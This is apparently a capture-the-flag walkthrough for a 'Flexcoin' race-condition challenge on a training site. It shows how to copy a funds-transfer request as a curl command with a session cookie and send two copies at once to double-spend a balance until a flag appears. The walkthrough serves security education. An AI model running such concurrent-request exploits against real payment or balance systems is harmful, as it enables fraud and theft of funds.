Walkthrough: Race Conditions (Flexcoin)

Tools Used:
Create two accounts, and login to one of them. Now open the Chrome Developer Tools.



In the Chrome Developer Tools, open up the Network tab, and checkmark the box "Preserve Log".



Now in the app, go ahead and send 1 BTC to your second account.



When you click send, a new network call will appear. Find it in the network tab, and make sure you have the correct one by verifying the Form Data (bottom right of screenshot) matches what you sent.



Once you find the correct network call, right click, click Copy / Copy as Curl.



You should now have in your clipboard something that looks like this:
curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed
         
To make this race condition exploit work, we want to send two requests at the same time. Curl makes that easy - just copy/paste it twice, and put an ampersand (&) between them.
curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed & curl 'https://php1.hackthe.company/challenge8/index.php' [bunch of junk here] -H 'Cookie: PHPSESSID=s17fftdnm1bpha7fnjou3h2s60' --data 'person_name=testbsb2&send_amount=1' --compressed
         
Now... you just need to run this in your terminal a number of times. Each time in between running it, you'll need to log into your second account and send the currency back to your first account. Also, as you gain more and more, you may want to edit the "send_amount=1" string in the curl commands you copied to a higher number to speed things up.

Once you manage to obtain 10,000 BTC the flag will be revealed.